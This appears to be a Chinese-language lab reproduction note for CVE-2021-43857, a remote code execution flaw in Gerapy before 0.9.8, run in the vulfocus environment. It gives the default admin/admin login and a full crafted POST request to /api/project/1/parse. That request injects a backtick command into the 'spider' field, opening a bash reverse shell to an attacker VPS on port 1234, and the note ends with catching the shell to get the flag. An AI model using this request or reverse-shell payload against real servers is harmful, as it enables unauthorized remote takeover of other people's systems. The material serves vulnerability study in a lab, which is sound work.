Gerapy-CVE-2021-43857
背景:
Gerapy 是一个分布式爬虫管理框架。0.9.8 版本之前的 Gerapy 容易受到远程代码执行的影响,此问题已在 0.9.8 版本中修复。 登录:admin/admin 复现之前先登入后,创建一个项目。
漏洞编号:
CVE- 2021-43857
影响版本:
< 0.9.8
复现步骤:
1,打开漏洞环境vulfocus
2,使用弱口令进入后台,点击项目管理
3,抓包
4,构造数据包POST
POST /api/project/1/parse HTTP/1.1
Host: vulfocus.fofa.so:37380
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Token 4f2273e09d59f4de6edf58bb28d9f96e0fefd40e
Connection: close
Referer: http://vulfocus.fofa.so:37380/
Cookie: zbx_sessionid=80402dd7222257588aeff3a3f5a4b7af; td_cookie=448830462; Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1639631760; zmGroup=1; Hm_lvt_deaeca6802357287fb453f342ce28dda=1640325563
Cache-Control: max-age=0
Content-Length: 79
Content-Type: application/x-www-form-urlencoded
{
"spider":"`/bin/bash -c 'bash -i >& /dev/tcp/VPS IP/1234 0>&1'`"
}
5,VPS开启监听,并发送构造好的POST包
6,得到flag